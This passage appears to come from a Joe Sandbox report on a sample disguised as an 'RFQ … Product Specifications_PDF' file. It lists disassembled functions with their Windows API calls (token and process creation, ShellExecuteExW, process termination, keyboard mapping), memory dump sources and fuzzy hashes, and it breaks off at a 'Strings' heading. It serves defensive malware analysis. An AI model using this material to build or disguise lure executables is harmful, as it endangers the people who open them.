                                                                                                                  • Part of subcall function 00AA0FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AA0FD6
                                                                                                                  • Part of subcall function 00AA0FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AA0FE5
                                                                                                                  • Part of subcall function 00AA0FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AA0FEC
                                                                                                                  • Part of subcall function 00AA0FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AA1002
                                                                                                                • GetLengthSid.ADVAPI32(?,00000000,00AA1335), ref: 00AA17AE
                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00AA17BA
                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00AA17C1
                                                                                                                • CopySid.ADVAPI32(00000000,00000000,?), ref: 00AA17DA
                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00AA1335), ref: 00AA17EE
                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00AA17F5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                • String ID:
                                                                                                                • API String ID: 3008561057-0
                                                                                                                • Opcode ID: 60045828c7318acb4874ef3d3b4eab4d954c764dac3c1555f521a841b14a445e
                                                                                                                • Instruction ID: f37201a944e0951eafe30d94f27eba084b3889835584f9924ad92ffd7184969f
                                                                                                                • Opcode Fuzzy Hash: 60045828c7318acb4874ef3d3b4eab4d954c764dac3c1555f521a841b14a445e
                                                                                                                • Instruction Fuzzy Hash: 2B11BB32601216FFDB10DFA4CC49FAE7BB9EB42365F104119F482A7290D736A941CF60
                                                                                                                Function 00AA14CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00AA14FF
                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00AA1506
                                                                                                                • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00AA1515
                                                                                                                • CloseHandle.KERNEL32(00000004), ref: 00AA1520
                                                                                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00AA154F
                                                                                                                • DestroyEnvironmentBlock.USERENV(00000000), ref: 00AA1563
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                • String ID:
                                                                                                                • API String ID: 1413079979-0
                                                                                                                • Opcode ID: 2ad9bd40d5c85ea7e0afa56fcfff905621888594047f69217a12c38d06d26e59
                                                                                                                • Instruction ID: b531b0721d8e1c356d65b72e8c4757e04a4e1f7986486462a59562686bad3d79
                                                                                                                • Opcode Fuzzy Hash: 2ad9bd40d5c85ea7e0afa56fcfff905621888594047f69217a12c38d06d26e59
                                                                                                                • Instruction Fuzzy Hash: 6611477250120ABBDB11CFD8DD49FDA7BA9EB49714F044115FA06A20A0C3758E61DB60
                                                                                                                Function 00A63382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(?,?,00A63379,00A62FE5), ref: 00A63390
                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A6339E
                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A633B7
                                                                                                                • SetLastError.KERNEL32(00000000,?,00A63379,00A62FE5), ref: 00A63409
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                • String ID:
                                                                                                                • API String ID: 3852720340-0
                                                                                                                • Opcode ID: 8e1490eae714a46c06c5f04957a723de6da14ae58542817d209314242647dad8
                                                                                                                • Instruction ID: 069a7954996c7d05dfa11b8b8cd0f9a5976b0363d89ac90f7cdc98fafefb7850
                                                                                                                • Opcode Fuzzy Hash: 8e1490eae714a46c06c5f04957a723de6da14ae58542817d209314242647dad8
                                                                                                                • Instruction Fuzzy Hash: 4701F733609311BEEE262BB4BD856676FB4EB15779720032AF5218A2F0FF114D139544
                                                                                                                Function 00A72D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(?,?,00A75686,00A83CD6,?,00000000,?,00A75B6A,?,?,?,?,?,00A6E6D1,?,00B08A48), ref: 00A72D78
                                                                                                                • _free.LIBCMT ref: 00A72DAB
                                                                                                                • _free.LIBCMT ref: 00A72DD3
                                                                                                                • SetLastError.KERNEL32(00000000,?,?,?,?,00A6E6D1,?,00B08A48,00000010,00A44F4A,?,?,00000000,00A83CD6), ref: 00A72DE0
                                                                                                                • SetLastError.KERNEL32(00000000,?,?,?,?,00A6E6D1,?,00B08A48,00000010,00A44F4A,?,?,00000000,00A83CD6), ref: 00A72DEC
                                                                                                                • _abort.LIBCMT ref: 00A72DF2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$_free$_abort
                                                                                                                • String ID:
                                                                                                                • API String ID: 3160817290-0
                                                                                                                • Opcode ID: 0fbe43aa3633020c2c403deef37f202a7bfd2089b1d2c71d2a45461532e4f197
                                                                                                                • Instruction ID: a92338d2a60dcb9d2f5795af0748af191504af428e9522a8aab0563f916d99f2
                                                                                                                • Opcode Fuzzy Hash: 0fbe43aa3633020c2c403deef37f202a7bfd2089b1d2c71d2a45461532e4f197
                                                                                                                • Instruction Fuzzy Hash: 45F0283290560137D6327378BD06F5B2669AFD17B1F25C119F82C921E3EF2088425360
                                                                                                                Function 00AD8A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A59639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A59693
                                                                                                                  • Part of subcall function 00A59639: SelectObject.GDI32(?,00000000), ref: 00A596A2
                                                                                                                  • Part of subcall function 00A59639: BeginPath.GDI32(?), ref: 00A596B9
                                                                                                                  • Part of subcall function 00A59639: SelectObject.GDI32(?,00000000), ref: 00A596E2
                                                                                                                • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00AD8A4E
                                                                                                                • LineTo.GDI32(?,00000003,00000000), ref: 00AD8A62
                                                                                                                • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00AD8A70
                                                                                                                • LineTo.GDI32(?,00000000,00000003), ref: 00AD8A80
                                                                                                                • EndPath.GDI32(?), ref: 00AD8A90
                                                                                                                • StrokePath.GDI32(?), ref: 00AD8AA0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                • String ID:
                                                                                                                • API String ID: 43455801-0
                                                                                                                • Opcode ID: ea5b59d8974472464ce1e4bc403b15b3d8b49cec1b9a4414564e6778e06b1546
                                                                                                                • Instruction ID: ed98e3cab99d4ce9eb83a66fa4adf88bfacfd417ea21cde4edfa8535cfe2f625
                                                                                                                • Opcode Fuzzy Hash: ea5b59d8974472464ce1e4bc403b15b3d8b49cec1b9a4414564e6778e06b1546
                                                                                                                • Instruction Fuzzy Hash: 18111E7600114DFFDF119F94EC48EDA7F6CEB043A0F408012BA169A161C7719D56DF60
                                                                                                                Function 00AA51FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetDC.USER32(00000000), ref: 00AA5218
                                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 00AA5229
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AA5230
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00AA5238
                                                                                                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00AA524F
                                                                                                                • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00AA5261
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsDevice$Release
                                                                                                                • String ID:
                                                                                                                • API String ID: 1035833867-0
                                                                                                                • Opcode ID: 2449e539fdef76f225c9be91973e413c6926cb64afc6ecf9f5eaf56a7dcac14b
                                                                                                                • Instruction ID: 8d8de79ebe3cd4b06860a41d470769a6ba73f1a927ee3af19a36c295b8d5ce7f
                                                                                                                • Opcode Fuzzy Hash: 2449e539fdef76f225c9be91973e413c6926cb64afc6ecf9f5eaf56a7dcac14b
                                                                                                                • Instruction Fuzzy Hash: 62018F75E01719BBEB109BF59C49B8EBFB8EF48761F044066FA05A7280D6709801CBA0
                                                                                                                Function 00A41BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A41BF4
                                                                                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00A41BFC
                                                                                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A41C07
                                                                                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A41C12
                                                                                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00A41C1A
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A41C22
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Virtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4278518827-0
                                                                                                                • Opcode ID: d6f157dd3697a338c62ba81f22102dcc1c713b762d10c9ad75990089897379eb
                                                                                                                • Instruction ID: 6b1a26abd65bae3ad8bb6fb5bb7ebd6aa8daebc5ebc0c59c226efa75b1b84c9e
                                                                                                                • Opcode Fuzzy Hash: d6f157dd3697a338c62ba81f22102dcc1c713b762d10c9ad75990089897379eb
                                                                                                                • Instruction Fuzzy Hash: B70167B0902B5ABDE3008F6A8C85B52FFB8FF19354F00411BA15C4BA42C7F5A864CBE5
                                                                                                                Function 00AAEB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00AAEB30
                                                                                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00AAEB46
                                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 00AAEB55
                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AAEB64
                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AAEB6E
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AAEB75
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 839392675-0
                                                                                                                • Opcode ID: badbfd99ccaa26714dd2ce2f4c611eebed240dd7088c7788becfbb085c923f59
                                                                                                                • Instruction ID: 78aa41c47d34c855423cf45200ec0329ec70f592475fec7d89e8889bdf2dc09f
                                                                                                                • Opcode Fuzzy Hash: badbfd99ccaa26714dd2ce2f4c611eebed240dd7088c7788becfbb085c923f59
                                                                                                                • Instruction Fuzzy Hash: 7AF0BB72142125BBD72097929C0DEEF7F7CEFC7B21F400159F512D1090D7A05A02C6B4
                                                                                                                Function 00A97439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetClientRect.USER32(?), ref: 00A97452
                                                                                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 00A97469
                                                                                                                • GetWindowDC.USER32(?), ref: 00A97475
                                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 00A97484
                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00A97496
                                                                                                                • GetSysColor.USER32(00000005), ref: 00A974B0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 272304278-0
                                                                                                                • Opcode ID: b04706f5200d4d01b452b2634a157491d2eac7027e16f199ab2b86074f84a876
                                                                                                                • Instruction ID: 13367f80cfdbbd56557811b5a989e6ad51c0799f40386920c9da1aa838055945
                                                                                                                • Opcode Fuzzy Hash: b04706f5200d4d01b452b2634a157491d2eac7027e16f199ab2b86074f84a876
                                                                                                                • Instruction Fuzzy Hash: 49018B31505216EFDB119FA4EC08BAE7BB5FB04321F900161F916A21A1CB311E42EB20
                                                                                                                Function 00AA1874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00AA187F
                                                                                                                • UnloadUserProfile.USERENV(?,?), ref: 00AA188B
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00AA1894
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00AA189C
                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00AA18A5
                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00AA18AC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 146765662-0
                                                                                                                • Opcode ID: ec0c87054e66766c95809c8b39e75659e6c120b544cc3c990885d23b5290238d
                                                                                                                • Instruction ID: 38412b34133b819bd0bf9062f66f10683601c908669a17a79d738cf7c58c4664
                                                                                                                • Opcode Fuzzy Hash: ec0c87054e66766c95809c8b39e75659e6c120b544cc3c990885d23b5290238d
                                                                                                                • Instruction Fuzzy Hash: 4FE0C236045112BBDA01ABE1ED0C90ABB29FB49B32B908222F226850B0CB329422DB50
                                                                                                                Function 00AAC5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A47620: _wcslen.LIBCMT ref: 00A47625
                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00AAC6EE
                                                                                                                • _wcslen.LIBCMT ref: 00AAC735
                                                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00AAC79C
                                                                                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00AAC7CA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 1227352736-4108050209
                                                                                                                • Opcode ID: 0f10c1f2b0b6a51d34812c906b7631fb018aba250ea176efa865d4b94e6097ec
                                                                                                                • Instruction ID: f17295b9616f9b96c45fa163bc0d67e30c2a994685c6cc27ebb1152465776157
                                                                                                                • Opcode Fuzzy Hash: 0f10c1f2b0b6a51d34812c906b7631fb018aba250ea176efa865d4b94e6097ec
                                                                                                                • Instruction Fuzzy Hash: AF51B1716043019BE715DF28C985BABB7E8AF8A324F040A2DF9A5D31E1DB74D944CF92
                                                                                                                Function 00ACAD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • ShellExecuteExW.SHELL32(0000003C), ref: 00ACAEA3
                                                                                                                  • Part of subcall function 00A47620: _wcslen.LIBCMT ref: 00A47625
                                                                                                                • GetProcessId.KERNEL32(00000000), ref: 00ACAF38
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00ACAF67
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                • String ID: <$@
                                                                                                                • API String ID: 146682121-1426351568
                                                                                                                • Opcode ID: 7bd24542d069522439a3d8a1c4bc3dcfe5cf26dd65ecc3257ffcc3ca2b18c848
                                                                                                                • Instruction ID: b1ca08febd1aa6f0d9b1cf3c0f85ab820d3c064f348cbc724b76f9260e659789
                                                                                                                • Opcode Fuzzy Hash: 7bd24542d069522439a3d8a1c4bc3dcfe5cf26dd65ecc3257ffcc3ca2b18c848
                                                                                                                • Instruction Fuzzy Hash: 83716574A00629DFCB14DF54C584AAEBBF0EF48314F05849DE81AAB3A2CB74ED45CB91
                                                                                                                Function 00AA719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00AA7206
                                                                                                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00AA723C
                                                                                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00AA724D
                                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00AA72CF
                                                                                                                Strings
                                                                                                                Memory Dump Source
